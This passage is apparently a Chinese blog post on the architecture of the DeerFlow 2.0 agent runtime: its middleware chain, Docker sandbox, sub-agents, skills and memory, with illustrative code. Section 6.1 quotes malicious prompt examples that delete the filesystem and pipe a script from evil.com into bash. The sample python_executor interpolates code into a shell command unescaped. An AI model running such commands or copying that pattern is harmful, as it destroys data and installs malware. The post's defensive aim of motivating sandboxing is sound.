编程 DeerFlow 2.0 深度实战:从 LangGraph 中间件链到 Docker 沙箱的超级智能体架构全解

2026-05-09 04:41:16 +0800 CST views 16

DeerFlow 2.0 深度实战:从 LangGraph 中间件链到 Docker 沙箱的超级智能体架构全解

字节跳动开源的超级智能体运行时,30天斩获 50K+ Star,代表 AI Agent 从"对话工具"到"执行系统"的根本性转变

一、背景:为什么 Agent 需要"运行时"而非"框架"

1.1 传统 Agent 框架的困境

2024-2025 年间,AI Agent 开发领域涌现了数十个框架:LangChain、AutoGen、CrewAI、Semantic Kernel……它们解决的核心问题是"如何让 LLM 调用工具"。但当你真正尝试构建一个能处理复杂任务的 Agent 时,会发现一个尴尬的现实:

框架给你的是"积木",但你需要的是"工厂"。

典型痛点:

# 传统框架的典型代码模式
agent = Agent(
    tools=[search_tool, code_tool, file_tool],
    memory=InMemoryChatHistory(),  # 重启即丢失
    # 沙箱?没有
    # 子 Agent 协调?自己写
    # 长期记忆?自己实现
    # 技能管理?自己设计
)

# 问题来了:
# 1. 执行代码时,谁来保证安全?
# 2. 任务拆解后,如何协调多个子任务?
# 3. 上下文爆炸时,如何压缩和持久化?
# 4. 技能越来越多,如何按需加载?

这些问题不是"框架"能解决的,它们需要的是一个完整的运行时基础设施——就像 JVM 之于 Java,Node.js 之于 JavaScript。

1.2 DeerFlow 的定位转变

DeerFlow 1.x 的定位是"Deep Research Framework",专注于辅助深度研究。2.0 版本做出了一个关键决策:

从"研究帮手"升级为"Super Agent Harness"——一个开箱即用的智能体运行时基础设施。

官方自述:

"DeerFlow 不再是一个需要你自行组装的框架,而是一个开箱即用的超级 Agent 基础设施——电池已包含,完全可扩展。"

"Harness"这个词很关键——它源自航空航天领域,指代"安全带系统"。在 Agent 语境下,它意味着:

  1. 安全执行:Docker 沙箱隔离
  2. 稳定运行:检查点与恢复机制
  3. 资源管理:上下文压缩、技能按需加载
  4. 团队协作:Lead Agent + 子 Agent 分层调度

二、整体架构:四层微服务设计

2.1 架构全景图

┌─────────────────────────────────────────────────────────────┐
│                        Nginx (Port 2026)                     │
│                    统一反向代理入口                           │
└─────────────────────────────────────────────────────────────┘
                              │
        ┌─────────────────────┼─────────────────────┐
        ▼                     ▼                     ▼
┌───────────────┐   ┌───────────────┐   ┌───────────────┐
│ LangGraph     │   │ Gateway API   │   │ Frontend      │
│ Server        │   │ (Port 8001)   │   │ (Next.js)     │
│ (Port 2024)   │   │               │   │ (Port 3000)   │
│               │   │ • Models API  │   │               │
│ • Agent运行时 │   │ • MCP配置     │   │ • 聊天界面    │
│ • 线程管理    │   │ • 技能管理    │   │ • 任务监控    │
│ • SSE流式传输 │   │ • 文件上传    │   │ • 结果展示    │
│ • 检查点      │   │ • 线程清理    │   │               │
└───────────────┘   └───────────────┘   └───────────────┘
        │                     │
        └──────────┬──────────┘
                   ▼
┌─────────────────────────────────────────────────────────────┐
│                    Lead Agent 核心引擎                       │
│              18层中间件链 (Middleware Chain)                 │
│                                                              │
│  ThreadData → Uploads → Sandbox → DanglingTool → LLMError   │
│  → Checkpoint → Memory → Skills → SubAgents → ...           │
└─────────────────────────────────────────────────────────────┘
                   │
        ┌──────────┼──────────┐
        ▼          ▼          ▼
┌───────────┐ ┌───────────┐ ┌───────────┐
│ Docker    │ │ Memory    │ │ Skills    │
│ Sandbox   │ │ System    │ │ Registry  │
│           │ │           │ │           │
│ • 文件系统│ │ • 短期记忆│ │ • Research│
│ • Bash    │ │ • 长期记忆│ │ • Report  │
│ • Python  │ │ • 向量存储│ │ • Code    │
│ • 网络隔离│ │           │ │ • Custom  │
└───────────┘ └───────────┘ └───────────┘

2.2 两种运行模式

DeerFlow 支持两种运行模式,适应不同场景:

模式进程数架构特点适用场景
Standard4Gateway + LangGraph 分离生产环境,需要 LangGraph Platform 的高级特性
Gateway3Gateway 嵌入 Agent 运行时资源敏感环境,启动更快
# docker-compose.yml 核心配置
services:
  nginx:
    image: nginx:alpine
    ports:
      - "2026:2026"
    volumes:
      - ./nginx.conf:/etc/nginx/nginx.conf

  langgraph-server:
    build: ./langgraph
    ports:
      - "2024:2024"
    environment:
      - LANGGRAPH_API_URL=http://localhost:2024
    volumes:
      - ./checkpoints:/app/checkpoints  # 检查点持久化

  gateway:
    build: ./gateway
    ports:
      - "8001:8001"
    environment:
      - SANDBOX_ENABLED=true
      - MEMORY_BACKEND=sqlite  # 支持 postgres/qdrant
    volumes:
      - /var/run/docker.sock:/var/run/docker.sock  # Docker 管理

2.3 为什么选择 LangGraph?

DeerFlow 选择 LangGraph 作为底层编排引擎,而非直接使用 LangChain。关键原因:

# LangChain: 线性链式调用
chain = prompt | llm | parser
result = chain.invoke(input)  # 单向流动,难以处理循环/分支

# LangGraph: 状态机 + 图结构
from langgraph.graph import StateGraph, END

workflow = StateGraph(AgentState)
workflow.add_node("planner", planner_node)
workflow.add_node("researcher", researcher_node)
workflow.add_node("coder", coder_node)
workflow.add_node("reporter", reporter_node)

# 条件分支
workflow.add_conditional_edges(
    "planner",
    lambda s: "research" if s["need_research"] else "code",
    {"research": "researcher", "code": "coder"}
)

# 循环:研究者可以递归调用自己
workflow.add_edge("researcher", "planner")  # 重新规划

# 检查点:随时暂停/恢复
app = workflow.compile(checkpointer=MemorySaver())

LangGraph 的核心优势:

  1. 状态持久化:每个节点执行后自动保存状态
  2. 人机协作:支持 interrupt_before 在关键节点暂停等待人工确认
  3. 循环与分支:原生支持复杂控制流
  4. 并行执行:多个子节点可并行运行

三、核心引擎:18 层中间件链

3.1 中间件架构设计

DeerFlow 的 Lead Agent 采用了严格的中间件链式架构,共 18 个中间件按序执行。这种设计借鉴了 Express.js / Koa 的中间件模式,但针对 Agent 场景做了深度定制。

# 核心中间件执行顺序
MIDDLEWARE_CHAIN = [
    # 1. 环境初始化层
    ThreadDataMiddleware,      # 创建线程隔离目录 /threads/{thread_id}/
    UploadsMiddleware,         # 注入用户上传的文件到工作区
    SandboxMiddleware,         # 获取/创建 Docker 沙箱环境
    
    # 2. 错误处理层
    DanglingToolCallMiddleware, # 处理中断的工具调用(如用户取消)
    LLMErrorHandlingMiddleware, # LLM 调用失败重试/降级
    
    # 3. 状态管理层
    CheckpointMiddleware,      # 执行前保存检查点
    MemoryMiddleware,          # 注入长期记忆到上下文
    
    # 4. 技能层
    SkillsLoadingMiddleware,   # 渐进式加载所需技能
    ToolsInjectionMiddleware,  # 将技能转换为 LangGraph Tools
    
    # 5. 子智能体层
    SubAgentOrchestrationMiddleware, # 子 Agent 调度
    
    # 6. 执行层
    LLMInvocationMiddleware,   # 实际调用 LLM
    ResponseProcessingMiddleware, # 处理 LLM 响应
    
    # 7. 后处理层
    ArtifactsExtractionMiddleware, # 提取生成的文件/报告
    MemoryUpdateMiddleware,    # 更新长期记忆
    CheckpointUpdateMiddleware, # 更新检查点
    
    # 8. 清理层
    SandboxCleanupMiddleware,  # 清理/保留沙箱
    ThreadCleanupMiddleware,   # 清理线程临时文件
]

3.2 核心中间件深度解析

3.2.1 ThreadDataMiddleware:线程隔离

每个对话线程拥有独立的工作目录,防止多任务冲突:

class ThreadDataMiddleware:
    async def __call__(self, state: AgentState, next_middleware):
        thread_id = state["thread_id"]
        
        # 创建线程专属目录结构
        thread_dir = Path(f"/threads/{thread_id}")
        thread_dir.mkdir(exist_ok=True)
        
        (thread_dir / "uploads").mkdir(exist_ok=True)   # 用户上传
        (thread_dir / "outputs").mkdir(exist_ok=True)   # Agent 输出
        (thread_dir / "workspace").mkdir(exist_ok=True) # 工作空间
        
        # 注入到状态
        state["thread_dir"] = str(thread_dir)
        state["uploads_dir"] = str(thread_dir / "uploads")
        state["outputs_dir"] = str(thread_dir / "outputs")
        
        return await next_middleware(state)

3.2.2 SandboxMiddleware:Docker 沙箱管理

这是 DeerFlow 最核心的安全特性。每个任务在独立的 Docker 容器中执行:

import docker
from docker.errors import ContainerError

class SandboxMiddleware:
    def __init__(self):
        self.client = docker.from_env()
        self.image = "deerflow/sandbox:latest"
    
    async def __call__(self, state: AgentState, next_middleware):
        thread_id = state["thread_id"]
        container_name = f"deerflow-sandbox-{thread_id}"
        
        # 检查是否已有容器
        try:
            container = self.client.containers.get(container_name)
            if container.status != "running":
                container.start()
        except docker.errors.NotFound:
            # 创建新容器
            container = self.client.containers.run(
                self.image,
                name=container_name,
                detach=True,
                # 资源限制
                mem_limit="2g",
                cpu_quota=100000,  # 1 CPU
                # 网络隔离(可选)
                network="deerflow-isolated",
                # 挂载工作目录
                volumes={
                    state["thread_dir"]: {
                        "bind": "/workspace",
                        "mode": "rw"
                    }
                },
                # 安全选项
                security_opt=["no-new-privileges"],
                cap_drop=["ALL"],
                cap_add=["CHOWN", "SETUID", "SETGID"],
            )
        
        state["sandbox_container"] = container
        state["sandbox_id"] = container.id
        
        # 注入执行函数
        state["execute_in_sandbox"] = self._make_executor(container)
        
        return await next_middleware(state)
    
    def _make_executor(self, container):
        async def execute(command: str, timeout: int = 60) -> dict:
            """在沙箱中执行命令"""
            try:
                result = container.exec_run(
                    cmd=f"timeout {timeout} {command}",
                    workdir="/workspace",
                    demux=True,  # 分离 stdout/stderr
                )
                return {
                    "exit_code": result.exit_code,
                    "stdout": result.output[0].decode() if result.output[0] else "",
                    "stderr": result.output[1].decode() if result.output[1] else "",
                }
            except Exception as e:
                return {"exit_code": -1, "error": str(e)}
        
        return execute

沙箱镜像构建

# deerflow/sandbox Dockerfile
FROM python:3.11-slim

# 安装常用工具
RUN apt-get update && apt-get install -y \
    curl wget git \
    nodejs npm \
    && rm -rf /var/lib/apt/lists/*

# 创建非 root 用户
RUN useradd -m -s /bin/bash agent
USER agent
WORKDIR /workspace

# 预装常用 Python 包
RUN pip install --user \
    requests beautifulsoup4 lxml \
    pandas numpy matplotlib \
    jupyter nbconvert

# 健康检查
HEALTHCHECK --interval=30s CMD pgrep python || exit 1

3.2.3 MemoryMiddleware:长期记忆注入

DeerFlow 的记忆系统分为三层:

class MemoryMiddleware:
    """
    记忆层次:
    1. 工作记忆(Working Memory): 当前对话上下文
    2. 情景记忆(Episodic Memory): 历史对话片段
    3. 语义记忆(Semantic Memory): 向量化知识库
    """
    
    async def __call__(self, state: AgentState, next_middleware):
        user_id = state["user_id"]
        query = state["user_query"]
        
        # 1. 检索相关情景记忆
        episodic_memories = await self.retrieve_episodic(
            user_id, query, top_k=5
        )
        
        # 2. 检索语义记忆(向量搜索)
        semantic_memories = await self.retrieve_semantic(
            user_id, query, top_k=10
        )
        
        # 3. 构建记忆上下文
        memory_context = self.format_memories(
            episodic=episodic_memories,
            semantic=semantic_memories
        )
        
        # 4. 注入到系统提示
        state["system_prompt"] += f"\n\n## 相关记忆\n{memory_context}"
        
        return await next_middleware(state)
    
    async def retrieve_episodic(self, user_id, query, top_k):
        """从 SQLite 检索历史对话片段"""
        # 使用 BM25 或语义相似度
        results = await self.db.query("""
            SELECT conversation_id, role, content, timestamp
            FROM conversations
            WHERE user_id = ?
            AND content LIKE ?
            ORDER BY timestamp DESC
            LIMIT ?
        """, (user_id, f"%{query}%", top_k * 2))
        
        # 重排序
        return self.rerank(results, query)[:top_k]
    
    async def retrieve_semantic(self, user_id, query, top_k):
        """向量检索"""
        query_embedding = await self.embed(query)
        
        results = await self.vector_store.search(
            collection=f"user_{user_id}",
            query_vector=query_embedding,
            top_k=top_k,
            filter={"type": "knowledge"}
        )
        
        return results

3.2.4 SkillsLoadingMiddleware:渐进式技能加载

这是 DeerFlow 区别于其他框架的关键创新——技能不是一次性全部加载,而是根据任务需求动态加载:

class SkillsLoadingMiddleware:
    """
    技能目录结构:
    /mnt/skills/
    ├── public/
    │   ├── research/SKILL.md
    │   ├── report-generation/SKILL.md
    │   ├── code-analysis/SKILL.md
    │   └── web-scraping/SKILL.md
    └── private/
        └── {user_id}/
            └── custom-skill/SKILL.md
    """
    
    async def __call__(self, state: AgentState, next_middleware):
        # 1. 分析任务需要哪些技能
        required_skills = await self.analyze_skill_requirements(
            state["user_query"],
            state.get("task_type")
        )
        
        # 2. 加载技能定义
        loaded_skills = []
        for skill_name in required_skills:
            skill = await self.load_skill(skill_name)
            if skill:
                loaded_skills.append(skill)
                # 更新上下文预算
                state["context_budget"] -= skill.token_count
        
        # 3. 按优先级排序
        loaded_skills.sort(key=lambda s: s.priority, reverse=True)
        
        state["skills"] = loaded_skills
        
        return await next_middleware(state)
    
    async def analyze_skill_requirements(self, query, task_type):
        """使用小模型快速判断需要哪些技能"""
        prompt = f"""
        分析以下任务需要哪些技能:
        
        任务:{query}
        类型:{task_type or "未知"}
        
        可用技能:research, report-generation, code-analysis, 
                 web-scraping, data-visualization, ppt-creation
        
        只返回需要的技能名称,用逗号分隔。
        """
        
        result = await self.fast_llm.invoke(prompt)
        return [s.strip() for s in result.split(",")]
    
    async def load_skill(self, skill_name):
        """加载技能定义"""
        skill_path = Path(f"/mnt/skills/public/{skill_name}/SKILL.md")
        
        if not skill_path.exists():
            return None
        
        content = skill_path.read_text()
        
        # 解析 SKILL.md
        skill = Skill(
            name=skill_name,
            definition=content,
            tools=self.extract_tools(content),
            prompts=self.extract_prompts(content),
            token_count=len(content) // 4,  # 粗略估算
            priority=self.extract_priority(content)
        )
        
        return skill

SKILL.md 示例

---
name: research
priority: 10
tools:
  - web_search
  - web_fetch
  - pdf_reader
---

# 深度研究技能

你是一个专业的研究员,擅长从互联网收集、整理、分析信息。

## 工作流程

1. **信息收集**:使用 web_search 搜索相关信息
2. **内容提取**:使用 web_fetch 获取详细内容
3. **信息综合**:整理并交叉验证信息
4. **报告生成**:生成结构化研究报告

## 最佳实践

- 优先搜索权威来源(官方文档、学术论文)
- 交叉验证关键信息
- 标注信息来源
- 区分事实与观点

## 示例

用户:研究 Python asyncio 的最佳实践

执行:
1. 搜索 "Python asyncio best practices 2024"
2. 获取官方文档和高质量博客
3. 整理成结构化报告

3.3 中间件的洋葱模型

中间件采用洋葱模型执行,支持前置和后置处理:

async def middleware_chain(state: AgentState):
    """
    执行流程:
    
    ThreadData.pre → Uploads.pre → Sandbox.pre → ... → LLM.invoke
                                                                    ↓
    ThreadData.post ← Uploads.post ← Sandbox.post ← ... ← Response
    """
    
    async def execute_layer(layer_idx, state):
        if layer_idx >= len(MIDDLEWARE_CHAIN):
            return state
        
        middleware = MIDDLEWARE_CHAIN[layer_idx]
        
        # 前置处理
        state = await middleware.before(state)
        
        # 递归执行下一层
        state = await execute_layer(layer_idx + 1, state)
        
        # 后置处理
        state = await middleware.after(state)
        
        return state
    
    return await execute_layer(0, state)

四、子智能体协作:Lead Agent + Dynamic Sub-agents

4.1 分层协作架构

DeerFlow 采用"项目经理 + 专家团队"模式:

┌─────────────────────────────────────────┐
│           Lead Agent (项目经理)          │
│  • 任务理解与拆解                        │
│  • 子 Agent 调度与协调                   │
│  • 结果整合与质量把控                    │
└─────────────────────────────────────────┘
                    │
        ┌───────────┼───────────┐
        ▼           ▼           ▼
┌───────────┐ ┌───────────┐ ┌───────────┐
│ Research  │ │   Coder   │ │ Reporter  │
│  Agent    │ │   Agent   │ │   Agent   │
│           │ │           │ │           │
│ • 搜索    │ │ • 代码生成│ │ • 报告撰写│
│ • 抓取    │ │ • 代码执行│ │ • PPT制作 │
│ • 分析    │ │ • 调试验证│ │ • 格式化  │
└───────────┘ └───────────┘ └───────────┘

4.2 子 Agent 定义与注册

from langgraph.graph import StateGraph
from langgraph.pregel import Pregel

class SubAgentRegistry:
    def __init__(self):
        self.agents = {}
        self._register_builtin_agents()
    
    def _register_builtin_agents(self):
        self.register("researcher", ResearcherAgent)
        self.register("coder", CoderAgent)
        self.register("reporter", ReporterAgent)
        self.register("analyst", AnalystAgent)
    
    def register(self, name: str, agent_class):
        self.agents[name] = agent_class
    
    async def spawn(self, name: str, config: dict) -> Pregel:
        agent_class = self.agents.get(name)
        if not agent_class:
            raise ValueError(f"Unknown agent: {name}")
        
        return agent_class(**config).build()


class ResearcherAgent:
    """研究员 Agent:负责信息收集"""
    
    def __init__(self, tools=None, memory=None):
        self.tools = tools or [
            web_search_tool,
            web_fetch_tool,
            pdf_reader_tool,
        ]
        self.memory = memory
    
    def build(self) -> Pregel:
        workflow = StateGraph(ResearcherState)
        
        workflow.add_node("plan", self.plan_search)
        workflow.add_node("search", self.execute_search)
        workflow.add_node("extract", self.extract_content)
        workflow.add_node("synthesize", self.synthesize_findings)
        
        workflow.set_entry_point("plan")
        workflow.add_edge("plan", "search")
        workflow.add_edge("search", "extract")
        workflow.add_edge("extract", "synthesize")
        workflow.set_finish_point("synthesize")
        
        return workflow.compile()
    
    async def plan_search(self, state):
        """规划搜索策略"""
        prompt = f"""
        任务:{state['task']}
        
        制定搜索策略:
        1. 确定搜索关键词
        2. 选择信息源优先级
        3. 设定信息质量标准
        """
        plan = await self.llm.invoke(prompt)
        state["search_plan"] = plan
        return state
    
    async def execute_search(self, state):
        """执行搜索"""
        results = []
        for keyword in state["search_plan"].keywords:
            result = await web_search_tool.ainvoke(keyword)
            results.extend(result)
        
        state["search_results"] = results
        return state


class CoderAgent:
    """程序员 Agent:负责代码生成与执行"""
    
    def __init__(self, sandbox_executor=None):
        self.executor = sandbox_executor
    
    def build(self) -> Pregel:
        workflow = StateGraph(CoderState)
        
        workflow.add_node("understand", self.understand_task)
        workflow.add_node("design", self.design_solution)
        workflow.add_node("implement", self.implement_code)
        workflow.add_node("test", self.test_code)
        workflow.add_node("fix", self.fix_issues)
        
        workflow.set_entry_point("understand")
        workflow.add_edge("understand", "design")
        workflow.add_edge("design", "implement")
        workflow.add_edge("implement", "test")
        
        # 测试失败则修复
        workflow.add_conditional_edges(
            "test",
            lambda s: "fix" if s["test_failed"] else END,
            {"fix": "fix", END: END}
        )
        workflow.add_edge("fix", "test")
        
        return workflow.compile()
    
    async def implement_code(self, state):
        """在沙箱中实现代码"""
        code = await self.llm.invoke(
            f"根据设计实现代码:\n{state['design']}"
        )
        
        # 写入沙箱
        await state["execute_in_sandbox"](
            f"cat > /workspace/solution.py << 'EOF'\n{code}\nEOF"
        )
        
        state["code"] = code
        return state
    
    async def test_code(self, state):
        """在沙箱中测试"""
        result = await state["execute_in_sandbox"](
            "python /workspace/solution.py"
        )
        
        state["test_result"] = result
        state["test_failed"] = result["exit_code"] != 0
        return state

4.3 Lead Agent 协调逻辑

class LeadAgent:
    """主控 Agent:任务分解与协调"""
    
    async def decompose_task(self, query: str) -> List[SubTask]:
        """将复杂任务分解为子任务"""
        prompt = f"""
        分析以下任务,分解为可并行执行的子任务:
        
        任务:{query}
        
        输出格式:
        - subtask_1: [描述] | agent: [researcher/coder/reporter] | deps: []
        - subtask_2: [描述] | agent: [researcher/coder/reporter] | deps: [subtask_1]
        ...
        
        注意:
        1. 标注依赖关系
        2. 最大化并行度
        3. 每个子任务明确负责 Agent
        """
        
        decomposition = await self.llm.invoke(prompt)
        return self.parse_decomposition(decomposition)
    
    async def orchestrate(self, subtasks: List[SubTask]):
        """编排子任务执行"""
        completed = {}
        
        while len(completed) < len(subtasks):
            # 找出所有依赖已满足的任务
            ready = [
                t for t in subtasks
                if t.id not in completed
                and all(d in completed for d in t.dependencies)
            ]
            
            # 并行执行
            results = await asyncio.gather(*[
                self.execute_subtask(t)
                for t in ready
            ])
            
            for task, result in zip(ready, results):
                completed[task.id] = result
        
        return completed
    
    async def execute_subtask(self, task: SubTask):
        """执行单个子任务"""
        agent = await self.registry.spawn(
            task.agent_type,
            config={
                "parent_context": task.context,
                "sandbox_executor": self.sandbox_executor,
            }
        )
        
        result = await agent.ainvoke({
            "task": task.description,
            "thread_id": task.id,
        })
        
        return result
    
    async def synthesize(self, subtask_results: dict) -> str:
        """综合子任务结果"""
        prompt = f"""
        整合以下子任务结果,生成最终回答:
        
        {json.dumps(subtask_results, indent=2, ensure_ascii=False)}
        
        要求:
        1. 保持逻辑连贯
        2. 突出关键发现
        3. 标注信息来源
        """
        
        return await self.llm.invoke(prompt)

4.4 实战示例:多 Agent 协作完成技术调研

async def tech_research_demo():
    """演示:研究 Python 并发编程最佳实践"""
    
    lead_agent = LeadAgent()
    
    # 1. 分解任务
    subtasks = await lead_agent.decompose_task(
        "研究 Python 并发编程最佳实践,包括 asyncio、threading、multiprocessing,"
        "并给出性能对比和选型建议"
    )
    
    """
    分解结果:
    - task_1: 搜索 asyncio 最佳实践 | agent: researcher | deps: []
    - task_2: 搜索 threading 最佳实践 | agent: researcher | deps: []
    - task_3: 搜索 multiprocessing 最佳实践 | agent: researcher | deps: []
    - task_4: 编写性能测试代码 | agent: coder | deps: [task_1, task_2, task_3]
    - task_5: 生成技术报告 | agent: reporter | deps: [task_4]
    """
    
    # 2. 编排执行
    results = await lead_agent.orchestrate(subtasks)
    
    # 3. 综合结果
    final_report = await lead_agent.synthesize(results)
    
    return final_report

五、技能系统:Markdown 驱动的可扩展能力

5.1 技能定义规范

DeerFlow 的技能系统采用 Markdown 作为定义语言,降低学习门槛:

---
name: data-analysis
version: 1.0.0
priority: 8
author: community
tools:
  - python_executor
  - pandas_reader
  - matplotlib_plot
  - statistical_test
dependencies:
  - research
---

# 数据分析技能

你是一个数据分析专家,擅长使用 Python 进行数据清洗、分析和可视化。

## 能力范围

- 数据清洗与预处理
- 统计分析与假设检验
- 数据可视化
- 机器学习基础

## 工作流程

### 1. 数据加载

```python
import pandas as pd

# 支持多种格式
df = pd.read_csv("data.csv")
df = pd.read_excel("data.xlsx")
df = pd.read_json("data.json")

2. 数据探索

# 基本信息
df.info()
df.describe()

# 缺失值分析
df.isnull().sum()

# 相关性分析
df.corr()

3. 可视化

import matplotlib.pyplot as plt

# 分布图
df['column'].hist()

# 散点图
plt.scatter(df['x'], df['y'])

# 热力图
import seaborn as sns
sns.heatmap(df.corr(), annot=True)

最佳实践

  1. 先理解数据:在分析前先做探索性数据分析(EDA)
  2. 处理缺失值:根据业务场景选择删除、填充或插值
  3. 验证假设:使用统计检验而非仅凭直觉
  4. 可视化优先:图表比表格更易理解

示例对话

用户:分析这份销售数据,找出销量下降的原因

执行

  1. 加载数据并做 EDA
  2. 按时间、地区、产品维度分析
  3. 识别异常点和趋势变化
  4. 生成分析报告和可视化图表

### 5.2 技能加载与转换

```python
class SkillLoader:
    """将 SKILL.md 转换为 LangGraph Tools"""
    
    def parse_skill(self, content: str) -> Skill:
        """解析 SKILL.md"""
        # 提取 YAML frontmatter
        if content.startswith("---"):
            _, frontmatter, body = content.split("---", 2)
            metadata = yaml.safe_load(frontmatter)
        else:
            metadata = {}
            body = content
        
        return Skill(
            name=metadata.get("name", "unknown"),
            priority=metadata.get("priority", 5),
            tools=metadata.get("tools", []),
            dependencies=metadata.get("dependencies", []),
            definition=body.strip(),
        )
    
    def skill_to_tool(self, skill: Skill) -> List[Tool]:
        """将技能转换为 LangChain Tools"""
        tools = []
        
        for tool_name in skill.tools:
            if tool_name == "python_executor":
                tools.append(self._create_python_tool(skill))
            elif tool_name == "web_search":
                tools.append(web_search_tool)
            elif tool_name == "matplotlib_plot":
                tools.append(self._create_plot_tool(skill))
            # ... 其他工具
        
        return tools
    
    def _create_python_tool(self, skill: Skill) -> Tool:
        """创建 Python 执行工具"""
        async def execute_python(code: str, state: AgentState):
            # 在沙箱中执行
            result = await state["execute_in_sandbox"](
                f"python -c '{code}'"
            )
            return result
        
        return Tool(
            name="python_executor",
            description=f"执行 Python 代码。{skill.definition[:200]}",
            func=execute_python,
        )

5.3 自定义技能开发

开发者可以轻松添加自定义技能:

---
name: stock-analysis
priority: 7
tools:
  - web_search
  - python_executor
  - matplotlib_plot
dependencies:
  - research
---

# 股票分析技能

你是一个股票分析专家,擅长基本面和技术面分析。

## 数据源

- 财务数据:从公开财报获取
- 行情数据:使用 yfinance 库
- 新闻舆情:搜索相关新闻

## 分析框架

### 基本面分析

1. 财务指标:PE、PB、ROE、负债率
2. 行业对比:与同行业公司比较
3. 成长性:营收和利润增长率

### 技术面分析

1. 趋势判断:MA、MACD
2. 支撑阻力:布林带、前高前低
3. 量价关系:成交量变化

## 示例

```python
import yfinance as yf

# 获取股票数据
stock = yf.Ticker("AAPL")
hist = stock.history(period="1y")

# 计算技术指标
hist['MA20'] = hist['Close'].rolling(20).mean()
hist['MA60'] = hist['Close'].rolling(60).mean()

# 可视化
hist[['Close', 'MA20', 'MA60']].plot()

将文件放入 `/mnt/skills/private/{user_id}/stock-analysis/SKILL.md` 即可使用。

## 六、Docker 沙箱:安全执行的基石

### 6.1 为什么必须用沙箱?

让 Agent 执行代码是危险的:

```python
# 恶意 prompt 示例
"请帮我执行以下代码:import os; os.system('rm -rf /')"

# 或者更隐蔽的
"分析这个数据文件:$(curl evil.com/malware.sh | bash)"

传统框架的解决方案:

方案问题
禁止代码执行丧失 Agent 核心能力
AST 白名单可被绕过,维护成本高
人工审核无法自动化,效率低

DeerFlow 的方案:Docker 容器隔离

6.2 沙箱安全配置

SANDBOX_SECURITY_CONFIG = {
    # 资源限制
    "mem_limit": "2g",
    "cpu_quota": 100000,  # 1 CPU
    "pids_limit": 256,
    
    # 网络隔离
    "network": "deerflow-isolated",  # 自定义网络
    "dns": ["8.8.8.8"],  # 可控 DNS
    
    # 文件系统
    "read_only_rootfs": False,  # 允许写入工作目录
    "tmpfs": {"/tmp": "size=100M"},  # 临时文件大小限制
    
    # 安全选项
    "security_opt": [
        "no-new-privileges",  # 禁止提权
    ],
    "cap_drop": ["ALL"],  # 移除所有能力
    "cap_add": [  # 仅添加必要能力
        "CHOWN",
        "SETUID",
        "SETGID",
    ],
    
    # 用户
    "user": "agent",  # 非 root 运行
}

6.3 网络隔离策略

# docker-compose.yml
networks:
  deerflow-isolated:
    driver: bridge
    internal: true  # 禁止访问外网(可选)
    ipam:
      config:
        - subnet: 172.28.0.0/16

  deerflow-external:
    driver: bridge
    # 允许访问外网

services:
  sandbox-internal:
    networks:
      - deerflow-isolated
    # 用于执行不可信代码
  
  sandbox-external:
    networks:
      - deerflow-external
    # 用于需要联网的任务(如数据下载)

6.4 执行结果处理

class SandboxExecutor:
    async def execute_with_artifacts(
        self,
        code: str,
        language: str = "python"
    ) -> ExecutionResult:
        """执行代码并提取产物"""
        
        # 1. 写入代码
        await self.write_code(code, language)
        
        # 2. 执行
        raw_result = await self.run()
        
        # 3. 收集产物
        artifacts = await self.collect_artifacts()
        
        return ExecutionResult(
            stdout=raw_result.stdout,
            stderr=raw_result.stderr,
            exit_code=raw_result.exit_code,
            artifacts=artifacts,  # 生成的文件、图表等
        )
    
    async def collect_artifacts(self) -> List[Artifact]:
        """收集执行产物"""
        artifacts = []
        output_dir = Path("/workspace/outputs")
        
        for file in output_dir.iterdir():
            if file.suffix in [".png", ".jpg", ".pdf", ".csv"]:
                artifacts.append(Artifact(
                    type=file.suffix[1:],
                    path=str(file),
                    content=await self.read_file(file),
                ))
        
        return artifacts

七、记忆系统:从短期到长期的完整链路

7.1 三层记忆架构

┌─────────────────────────────────────────────────────────┐
│                    工作记忆 (Working Memory)             │
│  • 当前对话上下文                                        │
│  • 最近 N 轮对话                                         │
│  • 容量:4K-8K tokens                                   │
│  • 生命周期:对话结束即清空                              │
└─────────────────────────────────────────────────────────┘
                           │
                           ▼
┌─────────────────────────────────────────────────────────┐
│                    情景记忆 (Episodic Memory)            │
│  • 历史对话片段                                          │
│  • 任务执行记录                                          │
│  • 容量:数十万 tokens                                   │
│  • 存储:SQLite / PostgreSQL                            │
│  • 检索:BM25 + 语义相似度                               │
└─────────────────────────────────────────────────────────┘
                           │
                           ▼
┌─────────────────────────────────────────────────────────┐
│                    语义记忆 (Semantic Memory)            │
│  • 向量化知识库                                          │
│  • 用户偏好、事实知识                                     │
│  • 容量:无上限                                          │
│  • 存储:Qdrant / Milvus                                │
│  • 检索:向量相似度搜索                                   │
└─────────────────────────────────────────────────────────┘

7.2 记忆压缩策略

当上下文接近限制时,DeerFlow 自动压缩:

class MemoryCompressor:
    """上下文压缩器"""
    
    async def compress(
        self,
        messages: List[Message],
        target_tokens: int
    ) -> List[Message]:
        """压缩消息列表到目标 token 数"""
        
        current_tokens = sum(m.token_count for m in messages)
        
        if current_tokens <= target_tokens:
            return messages
        
        # 1. 识别可压缩的消息
        compressible = [
            m for m in messages
            if m.role == "assistant" and len(m.content) > 500
        ]
        
        # 2. 对长消息生成摘要
        compressed = []
        for msg in compressible:
            summary = await self.summarize(msg.content)
            compressed.append(Message(
                role=msg.role,
                content=f"[摘要] {summary}",
                token_count=len(summary) // 4,
                original_id=msg.id,
            ))
        
        # 3. 替换原消息
        result = []
        for msg in messages:
            if msg.id in {m.original_id for m in compressed}:
                result.append(next(
                    c for c in compressed 
                    if c.original_id == msg.id
                ))
            else:
                result.append(msg)
        
        return result
    
    async def summarize(self, content: str) -> str:
        """生成摘要"""
        prompt = f"""
        将以下内容压缩为一句话摘要,保留关键信息:
        
        {content}
        
        摘要:
        """
        return await self.fast_llm.invoke(prompt)

7.3 长期记忆存储

class LongTermMemory:
    """长期记忆管理"""
    
    def __init__(self, db_path: str, vector_store):
        self.db = sqlite3.connect(db_path)
        self.vector_store = vector_store
        self._init_db()
    
    def _init_db(self):
        self.db.execute("""
            CREATE TABLE IF NOT EXISTS memories (
                id TEXT PRIMARY KEY,
                user_id TEXT NOT NULL,
                content TEXT NOT NULL,
                memory_type TEXT NOT NULL,  -- episodic/semantic
                embedding BLOB,
                metadata JSON,
                created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
                last_accessed TIMESTAMP,
                access_count INTEGER DEFAULT 0
            )
        """)
        
        self.db.execute("""
            CREATE INDEX IF NOT EXISTS idx_user_type 
            ON memories(user_id, memory_type)
        """)
    
    async def store(
        self,
        user_id: str,
        content: str,
        memory_type: str = "episodic",
        metadata: dict = None
    ):
        """存储记忆"""
        memory_id = str(uuid.uuid4())
        embedding = await self.embed(content)
